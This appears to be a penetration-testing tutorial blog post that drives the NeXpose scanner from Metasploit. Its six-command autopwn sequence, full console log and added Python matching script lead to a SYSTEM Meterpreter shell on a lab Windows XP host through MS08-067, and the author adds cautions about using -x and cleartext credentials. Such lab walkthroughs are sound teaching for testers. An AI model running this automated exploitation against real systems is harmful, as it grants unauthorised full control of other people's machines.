In the last post I showed how to install NeXpose on BackTrack 4 RC2; today we will drive NeXpose from inside Metasploit.
Metasploit ships a nexpose plugin that logs in to the NeXpose console, scans the target and imports the results into the msf database. With the -x flag on nexpose_scan it goes one step further: the imported vulnerability references (CVE, MSB, OSVDB and NeXpose check ids) are matched against the references carried by the exploit modules, and every exploit that matches is launched (this is db_autopwn doing the work). If one of them lands, we get an interactive Meterpreter shell. Let's begin.
1) Start the NeXpose scanner (the console must be listening on 127.0.0.1:3780 for the connect line below).
2) Start Metasploit and run the following:
root@bt:/pentest/exploits/framework3# ./msfconsole
msf > db_driver sqlite3
msf > db_create
msf > load nexpose
msf > nexpose_connect kislay:gotroot@127.0.0.1
msf > nexpose_scan -x 192.168.1.4
msf > sessions -i 1
Those six commands are all it takes to get from a NeXpose scan to a shell; the full session is below. Three things to keep in mind before copying them. First, db_create is already deprecated in this build: db_connect creates the database and schema itself, so the db_create line can be dropped. Second, -x hands the imported results straight to db_autopwn, which launches every matching exploit with no further check of the target; a memory-corruption exploit fired at the wrong OS or service pack usually crashes the service (or the box) instead of returning a shell, so on anything but a lab target leave -x off, import the results, and pick exploits by hand (db_autopwn -t -x lists the matches without launching anything; db_autopwn itself was removed from the framework not long after this post). Third, the password on the nexpose_connect line ends up in clear text in msfconsole's history file, so use a throwaway NeXpose account.
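The matching step that nexpose_scan -x performs, as an added Python example (this is not Metasploit or NeXpose code). It normalises scanner references into the CVE-/MSB-/OSVDB-/NEXPOSE- forms that appear in the "Matching Exploit Modules" list further down, pairs them with a hand-picked subset of exploit-module metadata, and, unlike db_autopwn, holds back any match whose host fingerprint does not confirm the module's platform. The XML is a constructed fragment loosely modelled on NeXpose's simple-XML export, so its element names are an assumption rather than the real schema; the module table and the 192.168.1.9 and 192.168.1.20 hosts are likewise made up for the example.

```python
"""
Reference matching in the style of db_autopwn -x: normalise scanner
findings to Metasploit-style references and pair them with exploit
modules carrying the same reference.  Added example, not code from
Metasploit or NeXpose.  SAMPLE_REPORT is constructed; its structure is
only loosely modelled on NeXpose's simple-XML export (assumption).
"""
import xml.etree.ElementTree as ET

# Constructed scan report (not a real NeXpose export).
SAMPLE_REPORT = """<NeXposeSimpleXML><devices>
<device address="192.168.1.4">
  <fingerprint><description>Microsoft Windows XP SP2</description></fingerprint>
  <services>
    <service name="CIFS"><port number="445" protocol="tcp"><vulnerabilities>
      <vulnerability id="dcerpc-ms-netapi-netpathcanonicalize-dos">
        <id type="cve">CVE-2008-4250</id><id type="msb">MS08-067</id></vulnerability>
      <vulnerability id="dcerpc-ms-netapi-netprpathcanonicalize-bof">
        <id type="cve">CVE-2006-3439</id></vulnerability>
    </vulnerabilities></port></service>
    <service name="HTTP"><port number="80" protocol="tcp"><vulnerabilities>
      <vulnerability id="http-server-banner"/>
    </vulnerabilities></port></service>
  </services>
</device>
<device address="192.168.1.9">
  <fingerprint><description>Ubuntu Linux 8.04</description></fingerprint>
  <services>
    <service name="FTP"><port number="21" protocol="tcp"><vulnerabilities>
      <vulnerability id="vsftpd-backdoor"><id type="osvdb">73573</id></vulnerability>
    </vulnerabilities></port></service>
  </services>
</device>
<device address="192.168.1.20">
  <fingerprint><description>Unknown</description></fingerprint>
  <services>
    <service name="CIFS"><port number="445" protocol="tcp"><vulnerabilities>
      <vulnerability id="dcerpc-ms-netapi-netpathcanonicalize-dos">
        <id type="cve">CVE-2008-4250</id></vulnerability>
    </vulnerabilities></port></service>
  </services>
</device>
</devices></NeXposeSimpleXML>"""

# Hand-picked subset of exploit metadata: module name -> (references, platform).
EXPLOIT_MODULES = {
    "exploit/windows/smb/ms08_067_netapi": ({"CVE-2008-4250", "MSB-MS08-067", "OSVDB-49243"}, "windows"),
    "exploit/windows/smb/ms06_040_netapi": ({"CVE-2006-3439", "MSB-MS06-040"}, "windows"),
    "exploit/unix/ftp/vsftpd_234_backdoor": ({"OSVDB-73573"}, "unix"),
}


def normalise_refs(vuln):
    """Turn one <vulnerability> element into Metasploit-style reference strings."""
    refs = {"NEXPOSE-" + vuln.get("id")}          # the scanner's own check id
    for ident in vuln.findall("id"):
        kind, value = ident.get("type", "").lower(), (ident.text or "").strip()
        if kind == "cve":
            refs.add(value.upper())
        elif kind in ("msb", "osvdb"):
            refs.add(f"{kind.upper()}-{value}")
    return refs


def guess_platform(description):
    """Coarse OS family from the fingerprint text; None means 'do not guess'."""
    d = description.lower()
    if "windows" in d:
        return "windows"
    if any(k in d for k in ("linux", "bsd", "solaris", "unix")):
        return "unix"
    return None


def plan_autopwn(report_xml, modules=EXPLOIT_MODULES):
    """
    Return (launch, hold) lists of (host, port, module) tuples.  'launch' holds
    matches whose module platform agrees with the host fingerprint; 'hold'
    holds matches where the fingerprint is unknown or disagrees, which
    db_autopwn -x would fire at anyway.
    """
    launch, hold = [], []
    root = ET.fromstring(report_xml)
    for dev in root.iter("device"):
        host = dev.get("address")
        platform = guess_platform(dev.findtext("fingerprint/description", default=""))
        for port in dev.iter("port"):
            portno = int(port.get("number"))
            seen = set()
            for vuln in port.iter("vulnerability"):
                seen |= normalise_refs(vuln)
            for name, (mod_refs, mod_platform) in modules.items():
                if mod_refs & seen:                 # any shared reference is a match
                    target = (host, portno, name)
                    (launch if platform == mod_platform else hold).append(target)
    return launch, hold


if __name__ == "__main__":
    go, wait = plan_autopwn(SAMPLE_REPORT)
    for h, p, m in go:
        print(f"launch  {h}:{p} {m}")
    for h, p, m in wait:
        print(f"hold    {h}:{p} {m}  (fingerprint does not confirm platform)")
```

Run as a script it prints the two 192.168.1.4:445 modules from the transcript plus the vsftpd match under "launch", and the unfingerprinted 192.168.1.20 host under "hold". The hold list is the point: db_autopwn has no such list and would throw ms08_067 at that host blind.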
root@bt:/pentest/exploits/framework3# ./msfconsole
(metasploit ASCII-art banner, garbled in extraction, omitted)
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 636 exploits - 319 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11120 updated 17 days ago (2010.11.24)
Warning: This copy of the Metasploit Framework was last updated 2 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > db_driver sqlite3
[*] Using database driver sqlite3
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS’s administration tools.
[-]
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load nexpose
____ _ _ _____ _ _ __ __
| _ \ __ _ _ __ (_) __| |___ | | \ | | ___\ \/ /_ __ ___ ___ ___
| |_) / _` | '_ \| |/ _` | / / | \| |/ _ \\ /| '_ \ / _ \/ __|/ _ \
| _ < (_| | |_) | | (_| | / / | |\ | __// \| |_) | (_) \__ \ __/
|_| \_\__,_| .__/|_|\__,_|/_/ |_| \_|\___/_/\_\ .__/ \___/|___/\___|
|_| |_|
[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose
msf > nexpose_connect kislay:gotroot@127.0.0.1
[*] Connecting to NeXpose instance at 127.0.0.1:3780 with username kislay…
msf > nexpose_scan -x 192.168.1.4
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
[*] Launching an automated exploitation session
[*] Analysis completed in 26 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.1.4:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos, CVE-2008-4250, CVE-2008-4250, OSVDB-49243, MSB-MS08-067, NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] 192.168.1.4:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.4:445…
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.4:445…
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution…
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution…
[*] (2/2 [0 sessions]): Waiting on 1 launched modules to finish execution…
[*] Meterpreter session 1 opened (192.168.1.7:18282 -> 192.168.1.4:1067) at Sat Dec 11 03:40:01 -0500 2010
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution…
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution…
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================
Active sessions
===============

Id  Type                   Information                             Connection                             Via
--  ----                   -----------                             ----------                             ---
1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TESTBOX-85474D5   192.168.1.7:18282 -> 192.168.1.4:1067  exploit/windows/smb/ms08_067_netapi
msf > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1040 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
C:\WINDOWS\system32>exit